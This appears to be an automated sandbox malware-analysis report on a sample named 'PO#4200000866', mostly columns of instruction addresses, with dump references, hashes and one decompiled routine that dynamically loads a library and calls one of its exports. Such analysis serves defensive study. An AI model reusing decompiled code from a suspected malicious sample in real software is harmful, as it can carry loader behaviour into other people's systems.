                                                                                      0x00406c16
                                                                                      0x00406c19
                                                                                      0x00406c1b
                                                                                      0x00406c1c
                                                                                      0x00406c1f
                                                                                      0x00406c21
                                                                                      0x00406c22
                                                                                      0x00406c24
                                                                                      0x00406c27
                                                                                      0x00406c2c
                                                                                      0x00406c31
                                                                                      0x00406c3a
                                                                                      0x00406c4d
                                                                                      0x00406c50
                                                                                      0x00406c5c
                                                                                      0x00406c84
                                                                                      0x00406c86
                                                                                      0x00406c94
                                                                                      0x00406c94
                                                                                      0x00406c98
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406c88
                                                                                      0x00406c88
                                                                                      0x00406c8b
                                                                                      0x00406c8c
                                                                                      0x00406c8c
                                                                                      0x00000000
                                                                                      0x00406c88
                                                                                      0x00406c62
                                                                                      0x00406c67
                                                                                      0x00406c67
                                                                                      0x00406c70
                                                                                      0x00406c78
                                                                                      0x00406c7b
                                                                                      0x00000000
                                                                                      0x00406c81
                                                                                      0x00406c81
                                                                                      0x00000000
                                                                                      0x00406c81
                                                                                      0x00000000
                                                                                      0x00406c9e
                                                                                      0x00406c9e
                                                                                      0x00406ca2
                                                                                      0x0040754e
                                                                                      0x00000000
                                                                                      0x0040754e
                                                                                      0x00406cab
                                                                                      0x00406cbb
                                                                                      0x00406cbe
                                                                                      0x00406cc1
                                                                                      0x00406cc1
                                                                                      0x00406cc1
                                                                                      0x00406cc4
                                                                                      0x00406cc8
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406cca
                                                                                      0x00406cd0
                                                                                      0x00406cfa
                                                                                      0x00406d00
                                                                                      0x00406d07
                                                                                      0x00000000
                                                                                      0x00406d07
                                                                                      0x00406cd6
                                                                                      0x00406cd9
                                                                                      0x00406cde
                                                                                      0x00406cde
                                                                                      0x00406ce9
                                                                                      0x00406cf1
                                                                                      0x00406cf4
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406d39
                                                                                      0x00406d3f
                                                                                      0x00406d42
                                                                                      0x00406d4f
                                                                                      0x00406d57
                                                                                      0x004073cb
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406d0e
                                                                                      0x00406d0e
                                                                                      0x00406d12
                                                                                      0x0040755d
                                                                                      0x00000000
                                                                                      0x0040755d
                                                                                      0x00406d1e
                                                                                      0x00406d29
                                                                                      0x00406d29
                                                                                      0x00406d29
                                                                                      0x00406d2c
                                                                                      0x00406d2f
                                                                                      0x00406d32
                                                                                      0x00406d37
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004073ce
                                                                                      0x004073ce
                                                                                      0x004073d4
                                                                                      0x004073da
                                                                                      0x004073e0
                                                                                      0x004073fa
                                                                                      0x004073fd
                                                                                      0x00407403
                                                                                      0x0040740e
                                                                                      0x00407410
                                                                                      0x004073e2
                                                                                      0x004073e2
                                                                                      0x004073f1
                                                                                      0x004073f5
                                                                                      0x004073f5
                                                                                      0x0040741a
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406d5f
                                                                                      0x00406d61
                                                                                      0x00406d64
                                                                                      0x00406dd5
                                                                                      0x00406dd8
                                                                                      0x00406ddb
                                                                                      0x00406de2
                                                                                      0x00406dec
                                                                                      0x004073cb
                                                                                      0x004073cb
                                                                                      0x00000000
                                                                                      0x004073cb
                                                                                      0x004073cb
                                                                                      0x00406d66
                                                                                      0x00406d6a
                                                                                      0x00406d6d
                                                                                      0x00406d6f
                                                                                      0x00406d72
                                                                                      0x00406d75
                                                                                      0x00406d77
                                                                                      0x00406d7a
                                                                                      0x00406d7c
                                                                                      0x00406d81
                                                                                      0x00406d84
                                                                                      0x00406d87
                                                                                      0x00406d8b
                                                                                      0x00406d92
                                                                                      0x00406d95
                                                                                      0x00406d9c
                                                                                      0x00406da0
                                                                                      0x00406da8
                                                                                      0x00406da8
                                                                                      0x00406da8
                                                                                      0x00406da2
                                                                                      0x00406da2
                                                                                      0x00406da2
                                                                                      0x00406d97
                                                                                      0x00406d97
                                                                                      0x00406d97
                                                                                      0x00406dac
                                                                                      0x00406daf
                                                                                      0x00406dcd
                                                                                      0x00406dcf
                                                                                      0x00000000
                                                                                      0x00406db1
                                                                                      0x00406db1
                                                                                      0x00406db4
                                                                                      0x00406db7
                                                                                      0x00406dba
                                                                                      0x00406dbc
                                                                                      0x00406dbc
                                                                                      0x00406dbc
                                                                                      0x00406dbf
                                                                                      0x00406dc2
                                                                                      0x00406dc4
                                                                                      0x00406dc5
                                                                                      0x00406dc8
                                                                                      0x00000000
                                                                                      0x00406dc8
                                                                                      0x00000000
                                                                                      0x00406ffe
                                                                                      0x00407002
                                                                                      0x00407020
                                                                                      0x00407023
                                                                                      0x0040702a
                                                                                      0x0040702d
                                                                                      0x00407030
                                                                                      0x00407033
                                                                                      0x00407036
                                                                                      0x00407039
                                                                                      0x0040703b
                                                                                      0x00407042
                                                                                      0x00407043
                                                                                      0x00407045
                                                                                      0x00407048
                                                                                      0x0040704b
                                                                                      0x0040704e
                                                                                      0x0040704e
                                                                                      0x00407053
                                                                                      0x00000000
                                                                                      0x00407053
                                                                                      0x00407004
                                                                                      0x00407007
                                                                                      0x0040700a
                                                                                      0x00407014
                                                                                      0x004073cb
                                                                                      0x004073cb
                                                                                      0x00000000
                                                                                      0x004073cb
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004070ab
                                                                                      0x004070af
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004070b5
                                                                                      0x004070b9
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004070bf
                                                                                      0x004070c1
                                                                                      0x004070c5
                                                                                      0x004070c5
                                                                                      0x004070c8
                                                                                      0x004070cc
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040711c
                                                                                      0x00407120
                                                                                      0x00407127
                                                                                      0x0040712a
                                                                                      0x0040712d
                                                                                      0x00407137
                                                                                      0x004073cb
                                                                                      0x004073cb
                                                                                      0x00000000
                                                                                      0x004073cb
                                                                                      0x004073cb
                                                                                      0x00407122
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407143
                                                                                      0x00407147
                                                                                      0x0040714e
                                                                                      0x00407151
                                                                                      0x00407154
                                                                                      0x00407149
                                                                                      0x00407149
                                                                                      0x00407149
                                                                                      0x00407157
                                                                                      0x0040715a
                                                                                      0x0040715d
                                                                                      0x0040715d
                                                                                      0x00407160
                                                                                      0x00407163
                                                                                      0x00407166
                                                                                      0x00407166
                                                                                      0x00407169
                                                                                      0x00407170
                                                                                      0x00407175
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407203
                                                                                      0x00407203
                                                                                      0x00407207
                                                                                      0x004075a5
                                                                                      0x00000000
                                                                                      0x004075a5
                                                                                      0x0040720d
                                                                                      0x00407210
                                                                                      0x00407213
                                                                                      0x00407217
                                                                                      0x0040721a
                                                                                      0x00407220
                                                                                      0x00407222
                                                                                      0x00407222
                                                                                      0x00407222
                                                                                      0x00407225
                                                                                      0x00407228
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406df8
                                                                                      0x00406df8
                                                                                      0x00406dfc
                                                                                      0x00407569
                                                                                      0x00000000
                                                                                      0x00407569
                                                                                      0x00406e02
                                                                                      0x00406e05
                                                                                      0x00406e08
                                                                                      0x00406e0c
                                                                                      0x00406e0f
                                                                                      0x00406e15
                                                                                      0x00406e17
                                                                                      0x00406e17
                                                                                      0x00406e17
                                                                                      0x00406e1a
                                                                                      0x00406e1d
                                                                                      0x00406e1d
                                                                                      0x00406e20
                                                                                      0x00406e23
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406e29
                                                                                      0x00406e2f
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406e35
                                                                                      0x00406e35
                                                                                      0x00406e39
                                                                                      0x00406e3c
                                                                                      0x00406e3f
                                                                                      0x00406e42
                                                                                      0x00406e45
                                                                                      0x00406e46
                                                                                      0x00406e49
                                                                                      0x00406e4b
                                                                                      0x00406e51
                                                                                      0x00406e54
                                                                                      0x00406e57
                                                                                      0x00406e5a
                                                                                      0x00406e5d
                                                                                      0x00406e60
                                                                                      0x00406e63
                                                                                      0x00406e7f
                                                                                      0x00406e82
                                                                                      0x00406e85
                                                                                      0x00406e88
                                                                                      0x00406e8f
                                                                                      0x00406e93
                                                                                      0x00406e95
                                                                                      0x00406e99
                                                                                      0x00406e65
                                                                                      0x00406e65
                                                                                      0x00406e69
                                                                                      0x00406e71
                                                                                      0x00406e76
                                                                                      0x00406e78
                                                                                      0x00406e7a
                                                                                      0x00406e7a
                                                                                      0x00406e9c
                                                                                      0x00406ea3
                                                                                      0x00406ea6
                                                                                      0x00000000
                                                                                      0x00406eac
                                                                                      0x00000000
                                                                                      0x00406eac
                                                                                      0x00000000
                                                                                      0x00406eb1
                                                                                      0x00406eb1
                                                                                      0x00406eb5
                                                                                      0x00407575
                                                                                      0x00000000
                                                                                      0x00407575
                                                                                      0x00406ebb
                                                                                      0x00406ebe
                                                                                      0x00406ec1
                                                                                      0x00406ec5
                                                                                      0x00406ec8
                                                                                      0x00406ece
                                                                                      0x00406ed0
                                                                                      0x00406ed0
                                                                                      0x00406ed0
                                                                                      0x00406ed3
                                                                                      0x00406ed6
                                                                                      0x00406ed6
                                                                                      0x00406ed6
                                                                                      0x00406edc
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406ede
                                                                                      0x00406ee1
                                                                                      0x00406ee4
                                                                                      0x00406ee7
                                                                                      0x00406eea
                                                                                      0x00406eed
                                                                                      0x00406ef0
                                                                                      0x00406ef3
                                                                                      0x00406ef6
                                                                                      0x00406ef9
                                                                                      0x00406efc
                                                                                      0x00406f14
                                                                                      0x00406f17
                                                                                      0x00406f1a
                                                                                      0x00406f1d
                                                                                      0x00406f1d
                                                                                      0x00406f20
                                                                                      0x00406f24
                                                                                      0x00406f26
                                                                                      0x00406efe
                                                                                      0x00406efe
                                                                                      0x00406f06
                                                                                      0x00406f0b
                                                                                      0x00406f0d
                                                                                      0x00406f0f
                                                                                      0x00406f0f
                                                                                      0x00406f29
                                                                                      0x00406f30
                                                                                      0x00406f33
                                                                                      0x00000000
                                                                                      0x00406f35
                                                                                      0x00000000
                                                                                      0x00406f35
                                                                                      0x00406f33
                                                                                      0x00406f3a
                                                                                      0x00406f3a
                                                                                      0x00406f3a
                                                                                      0x00406f3a
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406f75
                                                                                      0x00406f75
                                                                                      0x00406f79
                                                                                      0x00407581
                                                                                      0x00000000
                                                                                      0x00407581
                                                                                      0x00406f7f
                                                                                      0x00406f82
                                                                                      0x00406f85
                                                                                      0x00406f89
                                                                                      0x00406f8c
                                                                                      0x00406f92
                                                                                      0x00406f94
                                                                                      0x00406f94
                                                                                      0x00406f94
                                                                                      0x00406f97
                                                                                      0x00406f9a
                                                                                      0x00406f9a
                                                                                      0x00406fa0
                                                                                      0x00406f3e
                                                                                      0x00406f3e
                                                                                      0x00406f41
                                                                                      0x00000000
                                                                                      0x00406f41
                                                                                      0x00406fa2
                                                                                      0x00406fa2
                                                                                      0x00406fa5
                                                                                      0x00406fa8
                                                                                      0x00406fab
                                                                                      0x00406fae
                                                                                      0x00406fb1
                                                                                      0x00406fb4
                                                                                      0x00406fb7
                                                                                      0x00406fba
                                                                                      0x00406fbd
                                                                                      0x00406fc0
                                                                                      0x00406fd8
                                                                                      0x00406fdb
                                                                                      0x00406fde
                                                                                      0x00406fe1
                                                                                      0x00406fe1
                                                                                      0x00406fe4
                                                                                      0x00406fe8
                                                                                      0x00406fea
                                                                                      0x00406fc2
                                                                                      0x00406fc2
                                                                                      0x00406fca
                                                                                      0x00406fcf
                                                                                      0x00406fd1
                                                                                      0x00406fd3
                                                                                      0x00406fd3
                                                                                      0x00406fed
                                                                                      0x00406ff4
                                                                                      0x00406ff7
                                                                                      0x00000000
                                                                                      0x00406ff9
                                                                                      0x00000000
                                                                                      0x00406ff9
                                                                                      0x00000000
                                                                                      0x00407286
                                                                                      0x00407286
                                                                                      0x0040728a
                                                                                      0x004075b1
                                                                                      0x00000000
                                                                                      0x004075b1
                                                                                      0x00407290
                                                                                      0x00407293
                                                                                      0x00407296
                                                                                      0x0040729a
                                                                                      0x0040729d
                                                                                      0x004072a3
                                                                                      0x004072a5
                                                                                      0x004072a5
                                                                                      0x004072a5
                                                                                      0x004072a8
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407056
                                                                                      0x00407056
                                                                                      0x00407059
                                                                                      0x004073cb
                                                                                      0x004073cb
                                                                                      0x00000000
                                                                                      0x004073cb
                                                                                      0x00000000
                                                                                      0x00407395
                                                                                      0x00407399
                                                                                      0x004073bb
                                                                                      0x004073be
                                                                                      0x004073c8
                                                                                      0x004073cb
                                                                                      0x004073cb
                                                                                      0x00000000
                                                                                      0x004073cb
                                                                                      0x004073cb
                                                                                      0x0040739b
                                                                                      0x0040739e
                                                                                      0x004073a2
                                                                                      0x004073a5
                                                                                      0x004073a5
                                                                                      0x004073a8
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407452
                                                                                      0x00407456
                                                                                      0x00407474
                                                                                      0x00407474
                                                                                      0x00407474
                                                                                      0x0040747b
                                                                                      0x00407482
                                                                                      0x00407489
                                                                                      0x00407489
                                                                                      0x00000000
                                                                                      0x00407489
                                                                                      0x00407458
                                                                                      0x0040745b
                                                                                      0x0040745e
                                                                                      0x00407461
                                                                                      0x00407468
                                                                                      0x004073ac
                                                                                      0x004073ac
                                                                                      0x004073af
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407543
                                                                                      0x00407546
                                                                                      0x00407447
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040717d
                                                                                      0x0040717f
                                                                                      0x00407186
                                                                                      0x00407187
                                                                                      0x00407189
                                                                                      0x0040718c
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407194
                                                                                      0x00407197
                                                                                      0x0040719a
                                                                                      0x0040719c
                                                                                      0x0040719e
                                                                                      0x0040719e
                                                                                      0x0040719f
                                                                                      0x004071a2
                                                                                      0x004071a9
                                                                                      0x004071ac
                                                                                      0x004071ba
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407490
                                                                                      0x00407490
                                                                                      0x00407493
                                                                                      0x0040749a
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040749f
                                                                                      0x0040749f
                                                                                      0x004074a3
                                                                                      0x004075db
                                                                                      0x00000000
                                                                                      0x004075db
                                                                                      0x004074a9
                                                                                      0x004074ac
                                                                                      0x004074af
                                                                                      0x004074b3
                                                                                      0x004074b6
                                                                                      0x004074bc
                                                                                      0x004074be
                                                                                      0x004074be
                                                                                      0x004074be
                                                                                      0x004074c1
                                                                                      0x004074c4
                                                                                      0x004074c4
                                                                                      0x004074c4
                                                                                      0x004074c4
                                                                                      0x004074c7
                                                                                      0x004074c7
                                                                                      0x004074cb
                                                                                      0x0040752b
                                                                                      0x0040752e
                                                                                      0x00407533
                                                                                      0x00407534
                                                                                      0x00407536
                                                                                      0x00407538
                                                                                      0x0040753b
                                                                                      0x00407447
                                                                                      0x00407447
                                                                                      0x00000000
                                                                                      0x0040744d
                                                                                      0x00407447
                                                                                      0x004074cd
                                                                                      0x004074d3
                                                                                      0x004074d6
                                                                                      0x004074d9
                                                                                      0x004074dc
                                                                                      0x004074df
                                                                                      0x004074e2
                                                                                      0x004074e5
                                                                                      0x004074e8
                                                                                      0x004074eb
                                                                                      0x004074ee
                                                                                      0x00407507
                                                                                      0x0040750a
                                                                                      0x0040750d
                                                                                      0x00407510
                                                                                      0x00407514
                                                                                      0x00407516
                                                                                      0x00407516
                                                                                      0x00407517
                                                                                      0x0040751a
                                                                                      0x004074f0
                                                                                      0x004074f0
                                                                                      0x004074f8
                                                                                      0x004074fd
                                                                                      0x004074ff
                                                                                      0x00407502
                                                                                      0x00407502
                                                                                      0x0040751d
                                                                                      0x00407524
                                                                                      0x00000000
                                                                                      0x00407526
                                                                                      0x00000000
                                                                                      0x00407526
                                                                                      0x00000000
                                                                                      0x004071c2
                                                                                      0x004071c5
                                                                                      0x004071fb
                                                                                      0x0040732b
                                                                                      0x0040732b
                                                                                      0x0040732b
                                                                                      0x0040732b
                                                                                      0x0040732e
                                                                                      0x0040732e
                                                                                      0x00407331
                                                                                      0x00407333
                                                                                      0x004075bd
                                                                                      0x00000000
                                                                                      0x004075bd
                                                                                      0x00407339
                                                                                      0x0040733c
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407342
                                                                                      0x00407346
                                                                                      0x00407349
                                                                                      0x00407349
                                                                                      0x00407349
                                                                                      0x00000000
                                                                                      0x00407349
                                                                                      0x004071c7
                                                                                      0x004071c9
                                                                                      0x004071cb
                                                                                      0x004071cd
                                                                                      0x004071d0
                                                                                      0x004071d1
                                                                                      0x004071d3
                                                                                      0x004071d5
                                                                                      0x004071d8
                                                                                      0x004071db
                                                                                      0x004071f1
                                                                                      0x004071f6
                                                                                      0x0040722e
                                                                                      0x0040722e
                                                                                      0x00407232
                                                                                      0x0040725e
                                                                                      0x00407260
                                                                                      0x00407267
                                                                                      0x0040726a
                                                                                      0x0040726d
                                                                                      0x0040726d
                                                                                      0x00407272
                                                                                      0x00407272
                                                                                      0x00407274
                                                                                      0x00407277
                                                                                      0x0040727e
                                                                                      0x00407281
                                                                                      0x004072ae
                                                                                      0x004072ae
                                                                                      0x004072b1
                                                                                      0x004072b4
                                                                                      0x00407328
                                                                                      0x00407328
                                                                                      0x00407328
                                                                                      0x00000000
                                                                                      0x00407328
                                                                                      0x004072b6
                                                                                      0x004072bc
                                                                                      0x004072bf
                                                                                      0x004072c2
                                                                                      0x004072c5
                                                                                      0x004072c8
                                                                                      0x004072cb
                                                                                      0x004072ce
                                                                                      0x004072d1
                                                                                      0x004072d4
                                                                                      0x004072d7
                                                                                      0x004072f0
                                                                                      0x004072f2
                                                                                      0x004072f5
                                                                                      0x004072f6
                                                                                      0x004072f9
                                                                                      0x004072fb
                                                                                      0x004072fe
                                                                                      0x00407300
                                                                                      0x00407302
                                                                                      0x00407305
                                                                                      0x00407307
                                                                                      0x0040730a
                                                                                      0x0040730e
                                                                                      0x00407310
                                                                                      0x00407310
                                                                                      0x00407311
                                                                                      0x00407314
                                                                                      0x00407317
                                                                                      0x004072d9
                                                                                      0x004072d9
                                                                                      0x004072e1
                                                                                      0x004072e6
                                                                                      0x004072e8
                                                                                      0x004072eb
                                                                                      0x004072eb
                                                                                      0x0040731a
                                                                                      0x00407321
                                                                                      0x004072ab
                                                                                      0x004072ab
                                                                                      0x004072ab
                                                                                      0x004072ab
                                                                                      0x00000000
                                                                                      0x00407323
                                                                                      0x00000000
                                                                                      0x00407323
                                                                                      0x00407321
                                                                                      0x00407234
                                                                                      0x00407237
                                                                                      0x00407239
                                                                                      0x0040723c
                                                                                      0x0040723f
                                                                                      0x00407242
                                                                                      0x00407244
                                                                                      0x00407247
                                                                                      0x0040724a
                                                                                      0x0040724a
                                                                                      0x0040724d
                                                                                      0x0040724d
                                                                                      0x00407250
                                                                                      0x00407257
                                                                                      0x0040722b
                                                                                      0x0040722b
                                                                                      0x0040722b
                                                                                      0x0040722b
                                                                                      0x00000000
                                                                                      0x00407259
                                                                                      0x00000000
                                                                                      0x00407259
                                                                                      0x00407257
                                                                                      0x004071dd
                                                                                      0x004071e0
                                                                                      0x004071e2
                                                                                      0x004071e5
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406f44
                                                                                      0x00406f44
                                                                                      0x00406f48
                                                                                      0x0040758d
                                                                                      0x00000000
                                                                                      0x0040758d
                                                                                      0x00406f4e
                                                                                      0x00406f51
                                                                                      0x00406f54
                                                                                      0x00406f57
                                                                                      0x00406f5a
                                                                                      0x00406f5d
                                                                                      0x00406f60
                                                                                      0x00406f62
                                                                                      0x00406f65
                                                                                      0x00406f68
                                                                                      0x00406f6b
                                                                                      0x00406f6d
                                                                                      0x00406f6d
                                                                                      0x00406f6d
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004070cf
                                                                                      0x004070cf
                                                                                      0x004070d3
                                                                                      0x00407599
                                                                                      0x00000000
                                                                                      0x00407599
                                                                                      0x004070d9
                                                                                      0x004070dc
                                                                                      0x004070df
                                                                                      0x004070e2
                                                                                      0x004070e4
                                                                                      0x004070e4
                                                                                      0x004070e4
                                                                                      0x004070e7
                                                                                      0x004070ea
                                                                                      0x004070ed
                                                                                      0x004070f0
                                                                                      0x004070f3
                                                                                      0x004070f6
                                                                                      0x004070f7
                                                                                      0x004070f9
                                                                                      0x004070f9
                                                                                      0x004070f9
                                                                                      0x004070fc
                                                                                      0x004070ff
                                                                                      0x00407102
                                                                                      0x00407105
                                                                                      0x00407105
                                                                                      0x00407105
                                                                                      0x00407108
                                                                                      0x0040710a
                                                                                      0x0040710a
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040734c
                                                                                      0x0040734c
                                                                                      0x0040734c
                                                                                      0x00407350
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407356
                                                                                      0x00407359
                                                                                      0x0040735c
                                                                                      0x0040735f
                                                                                      0x00407361
                                                                                      0x00407361
                                                                                      0x00407361
                                                                                      0x00407364
                                                                                      0x00407367
                                                                                      0x0040736a
                                                                                      0x0040736d
                                                                                      0x00407370
                                                                                      0x00407373
                                                                                      0x00407374
                                                                                      0x00407376
                                                                                      0x00407376
                                                                                      0x00407376
                                                                                      0x00407379
                                                                                      0x0040737c
                                                                                      0x0040737f
                                                                                      0x00407382
                                                                                      0x00407385
                                                                                      0x00407389
                                                                                      0x0040738b
                                                                                      0x0040738e
                                                                                      0x00000000
                                                                                      0x00407390
                                                                                      0x0040710d
                                                                                      0x0040710d
                                                                                      0x00000000
                                                                                      0x0040710d
                                                                                      0x0040738e
                                                                                      0x004075c3
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406bf2
                                                                                      0x004075fa
                                                                                      0x004075fa
                                                                                      0x00000000
                                                                                      0x004075fa
                                                                                      0x00407447
                                                                                      0x004073ce
                                                                                      0x004073cb

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.42097271527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.42097227053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097343233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097389831.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097535496.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097584589.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097644348.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097694794.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_PO#4200000866.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b33066b9a67caffcdb2859c2a3d237c195f810e8b6f417b46283b98aba377de3
                                                                                      • Instruction ID: 947ff9f4813c08031b822263453b6bbc7859602ae013fffc9a74d3363ad91bbb
                                                                                      • Opcode Fuzzy Hash: b33066b9a67caffcdb2859c2a3d237c195f810e8b6f417b46283b98aba377de3
                                                                                      • Instruction Fuzzy Hash: FE713471E04228DBEF28CF98C8547ADBBB1FF44305F15806AD856BB281C778A986DF45
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 60%
                                                                                      			E004020D8(void* __ebx, void* __eflags) {
                                                                                      				struct HINSTANCE__* _t23;
                                                                                      				struct HINSTANCE__* _t31;
                                                                                      				void* _t32;
                                                                                      				WCHAR* _t35;
                                                                                      				intOrPtr* _t36;
                                                                                      				void* _t37;
                                                                                      				void* _t39;
                                                                                      
                                                                                      				_t32 = __ebx;
                                                                                      				asm("sbb eax, 0x42a320");
                                                                                      				 *(_t39 - 4) = 1;
                                                                                      				if(__eflags < 0) {
                                                                                      					_push(0xffffffe7);
                                                                                      					L15:
                                                                                      					E00401423();
                                                                                      					L16:
                                                                                      					 *0x42a2e8 =  *0x42a2e8 +  *(_t39 - 4);
                                                                                      					return 0;
                                                                                      				}
                                                                                      				_t35 = E00402DA6(0xfffffff0);
                                                                                      				 *((intOrPtr*)(_t39 - 0x44)) = E00402DA6(1);
                                                                                      				if( *((intOrPtr*)(_t39 - 0x20)) == __ebx) {
                                                                                      					L3:
                                                                                      					_t23 = LoadLibraryExW(_t35, _t32, 8); // executed
                                                                                      					_t47 = _t23 - _t32;
                                                                                      					 *(_t39 + 8) = _t23;
                                                                                      					if(_t23 == _t32) {
                                                                                      						_push(0xfffffff6);
                                                                                      						goto L15;
                                                                                      					}
                                                                                      					L4:
                                                                                      					_t36 = E00406AA4(_t47,  *(_t39 + 8),  *((intOrPtr*)(_t39 - 0x44)));
                                                                                      					if(_t36 == _t32) {
                                                                                      						E004056CA(0xfffffff7,  *((intOrPtr*)(_t39 - 0x44)));
                                                                                      					} else {
                                                                                      						 *(_t39 - 4) = _t32;
                                                                                      						if( *((intOrPtr*)(_t39 - 0x28)) == _t32) {
                                                                                      							 *_t36( *((intOrPtr*)(_t39 - 8)), 0x400, _t37, 0x40ce58, 0x40a000); // executed
                                                                                      						} else {
                                                                                      							E00401423( *((intOrPtr*)(_t39 - 0x28)));
                                                                                      							if( *_t36() != 0) {
                                                                                      								 *(_t39 - 4) = 1;
                                                                                      							}
                                                                                      						}
                                                                                      					}
                                                                                      					if( *((intOrPtr*)(_t39 - 0x24)) == _t32 && E00403CB7( *(_t39 + 8)) != 0) {
                                                                                      						FreeLibrary( *(_t39 + 8)); // executed
                                                                                      					}
                                                                                      					goto L16;
                                                                                      				}
                                                                                      				_t31 = GetModuleHandleW(_t35); // executed
                                                                                      				 *(_t39 + 8) = _t31;
                                                                                      				if(_t31 != __ebx) {
                                                                                      					goto L4;
                                                                                      				}
                                                                                      				goto L3;
                                                                                      			}










                                                                                      0x004020d8
                                                                                      0x004020d8
                                                                                      0x004020dd
                                                                                      0x004020e4
                                                                                      0x004021a3
                                                                                      0x004022f1
                                                                                      0x004022f1
                                                                                      0x00402c2a
                                                                                      0x00402c2d
                                                                                      0x00402c39
                                                                                      0x00402c39
                                                                                      0x004020f3
                                                                                      0x004020fd
                                                                                      0x00402100
                                                                                      0x00402110
                                                                                      0x00402114
                                                                                      0x0040211a
                                                                                      0x0040211c
                                                                                      0x0040211f
                                                                                      0x0040219c
                                                                                      0x00000000
                                                                                      0x0040219c
                                                                                      0x00402121
                                                                                      0x0040212c
                                                                                      0x00402130
                                                                                      0x00402170
                                                                                      0x00402132
                                                                                      0x00402135
                                                                                      0x00402138
                                                                                      0x00402164
                                                                                      0x0040213a
                                                                                      0x0040213d
                                                                                      0x00402146
                                                                                      0x00402148
                                                                                      0x00402148
                                                                                      0x00402146
                                                                                      0x00402138
                                                                                      0x00402178
                                                                                      0x00402191
                                                                                      0x00402191
                                                                                      0x00000000
                                                                                      0x00402178
                                                                                      0x00402103
                                                                                      0x0040210b
                                                                                      0x0040210e
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000

                                                                                      APIs
                                                                                      • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402103
                                                                                        • Part of subcall function 004056CA: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                                                        • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                                                        • Part of subcall function 004056CA: lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
                                                                                        • Part of subcall function 004056CA: SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                                                                                        • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                                                        • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                                                        • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                                                      • LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00402114
                                                                                      • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402191
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.42097271527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.42097227053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097343233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097389831.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097535496.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
